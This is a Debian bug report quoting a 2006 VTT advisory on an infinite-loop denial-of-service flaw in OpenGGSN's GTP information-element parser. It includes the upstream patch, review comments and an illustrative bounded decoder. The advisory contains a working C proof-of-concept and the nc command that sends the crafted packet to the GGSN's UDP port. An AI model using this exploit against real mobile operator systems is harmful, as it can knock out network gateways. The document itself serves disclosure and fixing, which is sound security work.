Package: openggsn
Severity: important
Tags: security patch etch

This was sent to [EMAIL PROTECTED] in 2006:
OpenGGSN Denial of Service Vulnerability

TNT project: http://www.vtt.fi/proj/tnt/index.jsp?lang=en
Copyright © 2006 VTT

Abstract

OpenGGSN is an open source implementation of a Gateway GPRS Support Node (GGSN). It is used by mobile operators as an interface between the Internet and the rest of the mobile network infrastructure. A Denial of Service (DoS) vulnerability -- caused by an infinite loop in GTPIE parsing when a UDP packet with more than GTPIE_SIZE (256) elements is received -- was found with the Codenomicon GTP test suite. A fix developed by VTT is provided with this advisory.

-------------------------------------------------------------------------------

Table of Contents

Background
  GTP
  OpenGGSN
  Codenomicon GTP Test Suite
Affected Products
Details
Exploiting The Vulnerability
Fix
About VTT

Background

GTP

http://en.wikipedia.org/wiki/GPRS_Tunnelling_Protocol

GPRS Tunnelling Protocol (or GTP) is an IP based protocol used within GSM and UMTS networks. The GTP protocol is layered on top of UDP. There are in fact three separate protocols, GTP-C, GTP-U and GTP'. GTP-C is used within the GPRS core network for signalling between GPRS Support Nodes (GGSNs and SGSNs). This allows the SGSN to activate a session on the user's behalf (PDP context activation), to deactivate the same session, to adjust quality of service parameters or to update a session for a subscriber who has just arrived from another SGSN. GTP-U is used for carrying user data within the GPRS core network and between the Radio Access Network and the core network. The user data transported can be packets in any of IPv4, IPv6 or PPP formats.

OpenGGSN

http://www.openggsn.org

OpenGGSN is an open source implementation of a Gateway GPRS Support Node (GGSN). It is used by mobile operators as the interface between the Internet and the rest of the mobile network infrastructure.
Codenomicon GTP Test Suite

http://www.codenomicon.com/products/telecommunications/gtp/

Codenomicon GTP Test Tools help proactively eliminate security flaws in GTP implementations. The test tool converts your test workstation into a GPRS Support Node for testing the robustness of GPRS Tunneling Protocol (GTP) implementations. The test tools test GTP implementations for development flaws using the unique Codenomicon fault injection technology.

Affected Products

* OpenGGSN versions 0.83 and 0.84

Details

VTT's TNT project (http://www.vtt.fi/proj/tnt/index.jsp?lang=en) used the Codenomicon GTP test suite to test an OpenGGSN installation based on the Debian unstable/sid distribution. One of the findings is that running any test case containing a message with more than 256 information elements in the payload caused OpenGGSN to go into an infinite loop, thus causing a Denial of Service condition and unnecessary consumption of CPU resources.

Exploiting The Vulnerability

The attacker can make a Denial of Service attack simply by sending a UDP message containing more than 256 information elements to the OpenGGSN server.

/*
 * OpenGGSN - Gateway GPRS Support Node
 * Copyright (C) 2002, 2003, 2004 Mondru AB.
 *
 * The contents of this file may be used under the terms of the GNU
 * General Public License Version 2, provided that the above copyright
 * notice and this permission notice is included in all copies or
 * substantial portions of the software.
 *
 * Copyright (C) 2006 VTT
 */

/*
 * Proof of concept for OpenGGSN GTPIE parsing Denial-of-Service condition.
 *
 * compile in openggsn-0.84/gtp directory:
 *   cc -Wall -g -O0 -L.libs -lgtp gtpie_dos.c -o gtpie_dos
 * run OpenGGSN:
 *   ./ggsn --fg --debug -c ../examples/ggsn.conf -l 127.0.0.1
 * run PoC:
 *   ./gtpie_dos | nc -q 0 -u 127.0.0.1 3386
 * resulting DoS:
 *   PID   USER  PR  NI  VIRT  RES  SHR S %CPU %MEM   TIME+  COMMAND
 *   29972 root  25   0  133m 3488 1412 R 98.5  0.3 0:05.23 lt-ggsn
 * UDP payload:
 *   ./gtpie_dos | hexdump -x
 *   0000000 101e 0202 0100 0000 ffff ffff beef dead
 *   0000010 0000 0000 0101 0101 0101 0101 0101 0101
 *   0000020 0101 0101 0101 0101 0101 0101 0101 0101
 *   *
 *   0000210 0101 0101 0101
 *   0000216
 */

#include <stdio.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include "pdp.h"
#include "gtp.h"
#include "gtpie.h"

int main(void)
{
  int i;
  struct gtp0_packet *packet = calloc(1, sizeof(struct gtp0_packet));

  /* header */
  struct gtp0_header *gtp0 = (struct gtp0_header *) packet;

  /* Initialise "standard" GTP0 header */
  gtp0->flags = 0x1e;
  gtp0->type = hton8(GTP_CREATE_PDP_REQ);
  gtp0->spare1 = 0xff;
  gtp0->spare2 = 0xff;
  gtp0->spare3 = 0xff;
  gtp0->number = 0xff;
  gtp0->seq = hton16(0x1);
  gtp0->flow = 0;
  gtp0->tid = 0xdeadbeef;
  int length = GTP0_HEADER_SIZE;

  /* data: GTPIE_SIZE + 1 one-byte Cause information elements */
  uint8_t qr = 0x1;
  for (i = 0; i <= GTPIE_SIZE; i++) {
    gtpie_tv0(packet, &length, GTP_MAX, GTPIE_CAUSE, sizeof(qr), &qr);
  }
  gtp0->length = hton16(length - GTP0_HEADER_SIZE);

  /* emit the finished datagram on stdout so it can be piped into nc */
  write(STDOUT_FILENO, (void *) packet, (size_t) length);
  return 0;
}

Fix

The problem lies in the parsing of information elements in GTP messages, which is implemented in the gtpie_decaps function of the gtp/gtpie.c file. The implementation does not check whether the message contains too many information elements, which causes the software to loop infinitely in the while-loop. In addition, a handling routine for the error situation had to be implemented outside the while-loop.

--- openggsn-0.84.orig/gtp/gtpie.c
+++ openggsn-0.84/gtp/gtpie.c
@@ -188,7 +188,7 @@
   memset(ie, 0, 4 * GTPIE_SIZE);
-  while (p<end) {
+  while ((p<end) && (j<GTPIE_SIZE)) {
     if (GTPIE_DEBUG) {
       printf("The packet looks like this:\n");
       for( i=0; i<(end-p); i++) {
@@ -346,6 +346,10 @@
 	     (unsigned long) p, (unsigned long) end);
     return 0; /* We landed at the end of the packet: OK */
   }
+  else if (!(j<GTPIE_SIZE)) {
+    if (GTPIE_DEBUG) printf("GTPIE too many elements.\n");
+    return EOF; /* We received too many information elements */
+  }
   else {
     if (GTPIE_DEBUG) printf("GTPIE exceeded end of packet. %lx %lx\n",
 			    (unsigned long) p, (unsigned long) end);

About VTT

http://www.vtt.fi/?lang=en

VTT is an impartial expert organisation. Its objective is to develop new technologies, create new innovations and value added, thus increasing customers' competencies. With its know-how VTT produces research, development, testing and information services to the public sector and companies as well as international organisations.
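Review bot: in the first hunk, the new bound `while ((p<end) && (j<GTPIE_SIZE))` only terminates the loop if `j` advances on every path through the body, and the body lies outside the hunk; confirm that each information-element branch (including whatever handles an unrecognised type) increments `j` or returns, otherwise a repeated element can still spin. A one-line comment on the condition, noting that GTPIE_SIZE is the capacity of the `ie` array cleared by `memset(ie, 0, 4 * GTPIE_SIZE)` just above, would document why the bound exists.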
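Review bot: in the second hunk, the new `else if (!(j<GTPIE_SIZE))` branch reports the condition only under GTPIE_DEBUG, yet this is exactly the case a remote sender triggers on purpose; an always-on, rate-limited log line or a counter would let operators see the rate of over-long messages in production. The comment should also state that EOF (the <stdio.h> constant) is being used as the parse-failure sentinel here, so callers of gtpie_decaps treat any non-zero return as a failed decode rather than testing for EOF specifically.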
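As an added example, not OpenGGSN code and not VTT's patch, the following C program shows the shape of the fix as a stand-alone decoder for the information-element section of a GTPv0 datagram: the element count is checked against the index capacity before each element is stored, each element's declared length is checked against the payload, and no iteration can complete without consuming bytes. The 20-byte header layout with the length field at bytes 2 and 3 follows the GTPv0 header the PoC builds; the constant MAX_IES (standing in for GTPIE_SIZE), the small type table and the helper functions are assumptions made for this illustration, and the inputs are constructed inline in the shape of the advisory's 257-element payload.

```c
/* Bounded IE decoder in the style of gtpie_decaps. Constructed example,
 * not OpenGGSN code: the type table, MAX_IES and the helper names are
 * assumptions made for this illustration. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define GTP0_HEADER_SIZE 20 /* fixed GTPv0 header; length field at bytes 2-3 */
#define MAX_IES 256         /* capacity of the IE index, the role GTPIE_SIZE plays */

enum ie_result {
  IE_OK = 0,
  IE_ERR_SHORT_HEADER = -1, /* datagram shorter than the fixed header */
  IE_ERR_BAD_LENGTH   = -2, /* header length field exceeds the datagram */
  IE_ERR_TRUNCATED    = -3, /* an element runs past the declared payload */
  IE_ERR_TOO_MANY     = -4, /* more elements than the index can hold */
  IE_ERR_UNKNOWN_TYPE = -5  /* fixed-size type whose size is not known */
};

struct ie_ref { uint8_t type; const uint8_t *value; size_t len; };

/* Value size for fixed-size (TV) types, i.e. type < 128. Only the type this
 * example needs is listed (assumed size); an unknown type is an error,
 * because guessing its size would desynchronise the parser. */
static int tv_value_len(uint8_t type)
{
  switch (type) {
  case 1:  return 1; /* Cause, the element the advisory's packet repeats */
  default: return -1;
  }
}

/* Walk the IE section after the header. Every iteration consumes at least one
 * byte or returns, and the element count is checked against MAX_IES before
 * the index is written, so termination never depends on the sender. */
int decode_ies(const uint8_t *pkt, size_t pkt_len, struct ie_ref *out, size_t *count)
{
  *count = 0;
  if (pkt_len < GTP0_HEADER_SIZE) return IE_ERR_SHORT_HEADER;
  size_t declared = ((size_t)pkt[2] << 8) | pkt[3];
  if (declared > pkt_len - GTP0_HEADER_SIZE) return IE_ERR_BAD_LENGTH;

  const uint8_t *p = pkt + GTP0_HEADER_SIZE, *end = p + declared;
  size_t j = 0;
  while (p < end) {
    if (j >= MAX_IES) return IE_ERR_TOO_MANY; /* the bound the fix introduces */
    uint8_t type = *p++;
    size_t len;
    if (type < 128) {                         /* TV: fixed-size value */
      int n = tv_value_len(type);
      if (n < 0) return IE_ERR_UNKNOWN_TYPE;
      len = (size_t)n;
    } else {                                  /* TLV: 16-bit big-endian length */
      if ((size_t)(end - p) < 2) return IE_ERR_TRUNCATED;
      len = ((size_t)p[0] << 8) | p[1];
      p += 2;
    }
    if ((size_t)(end - p) < len) return IE_ERR_TRUNCATED;
    out[j].type = type; out[j].value = p; out[j].len = len;
    p += len;
    j++;
  }
  *count = j;
  return IE_OK;
}

/* Constructed datagram (not captured traffic) carrying n one-byte Cause IEs:
 * the shape of the advisory's payload. */
static size_t build_cause_flood(uint8_t *buf, size_t n)
{
  memset(buf, 0, GTP0_HEADER_SIZE);
  buf[0] = 0x1e; buf[1] = 0x10;                  /* flags; Create PDP Context Request */
  buf[2] = (uint8_t)((2 * n) >> 8); buf[3] = (uint8_t)(2 * n);
  for (size_t i = 0; i < n; i++) {
    buf[GTP0_HEADER_SIZE + 2 * i] = 1;           /* type: Cause */
    buf[GTP0_HEADER_SIZE + 2 * i + 1] = 1;       /* value */
  }
  return GTP0_HEADER_SIZE + 2 * n;
}

/* Decode a flood of n Cause IEs (n <= MAX_IES + 8) and return the result code. */
int cause_flood_result(size_t n)
{
  static uint8_t buf[GTP0_HEADER_SIZE + 2 * (MAX_IES + 8)];
  struct ie_ref ies[MAX_IES];
  size_t count;
  if (n > MAX_IES + 8) return IE_ERR_BAD_LENGTH; /* would not fit the buffer */
  return decode_ies(buf, build_cause_flood(buf, n), ies, &count);
}

/* Constructed TLV element whose length field claims more bytes than the payload holds. */
int truncated_tlv_result(void)
{
  uint8_t buf[GTP0_HEADER_SIZE + 3] = {0};
  struct ie_ref ies[MAX_IES];
  size_t count;
  buf[3] = 3;                                    /* declared payload: 3 bytes */
  buf[GTP0_HEADER_SIZE] = 0x83;                  /* a TLV type */
  buf[GTP0_HEADER_SIZE + 2] = 0x10;              /* length 16, but nothing follows */
  return decode_ies(buf, sizeof buf, ies, &count);
}

int main(void)
{
  printf("257 Cause IEs -> %d, 256 -> %d, truncated TLV -> %d\n",
         cause_flood_result(MAX_IES + 1), cause_flood_result(MAX_IES),
         truncated_tlv_result());
  return 0;
}
```

The decisive line is the `j >= MAX_IES` check placed before `out[j]` is written: it makes the element index a hard limit on both loop iterations and array writes, which is the same property the patch's `j<GTPIE_SIZE` condition gives gtpie_decaps. Returning a distinct code for "too many elements" rather than folding it into the end-of-packet case also lets a caller count these datagrams separately, which is useful when the condition is being triggered on purpose.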